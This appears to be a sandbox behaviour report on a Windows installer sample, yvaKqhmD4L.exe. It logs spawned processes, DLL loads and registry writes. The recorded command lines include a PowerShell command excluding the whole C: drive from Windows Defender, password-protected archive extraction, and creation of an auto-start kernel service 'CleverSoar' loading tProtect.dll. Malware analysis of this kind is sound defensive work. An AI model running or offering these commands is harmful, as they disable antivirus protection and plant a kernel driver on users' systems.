Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp "C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: yvaKqhmD4L.exeStatic file information: File size 6745048 > 1048576
Source: yvaKqhmD4L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1793648038.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1793459655.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00D757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_00D757D0
